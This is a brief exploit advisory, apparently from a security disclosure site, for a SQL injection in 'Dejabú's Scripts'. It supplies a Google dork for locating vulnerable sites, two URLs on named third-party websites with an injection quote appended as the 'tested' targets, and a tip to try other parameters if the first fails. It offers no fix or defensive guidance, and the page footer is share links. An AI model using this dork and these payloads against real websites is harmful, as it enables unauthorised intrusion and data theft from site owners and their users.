Dejabú's Scripts SQL Injection

Published
Credit
Risk
2017.02.21
fl3xpl0it
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes
Dork: intext:Diseño de páginas web Dejabú inurl:php?id=

<—————— header data start ——————- >
#############################################################
# Application Name : SQLi in Dejabú's Scripts
# Vulnerable Type : SQL İnjection
# Google Dork: intext:Diseño de páginas web Dejabú inurl:php?id=
# Author: fl3xpl0it a.k.a KurokoTetsuya
# Date: 20.02.2017
# Tested On Demo Sites:
[+] http://www.cepaproduccion.com/content/news.php?id=1114'
[+] http://www.cedeal.org/content/publicaciones.php?id=34'&pagina=2
# Warning: If you not found SQLi , you try SQLi other parameter.
# Example: http://www.target.com/vuln.php?cat=54&id=61' (No SQLi)
# Example: http://www.target.com/vuln.php?cat=54'&id=61 (SQLi Detected)
#############################################################
< ——————- header data end of ——————- >


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com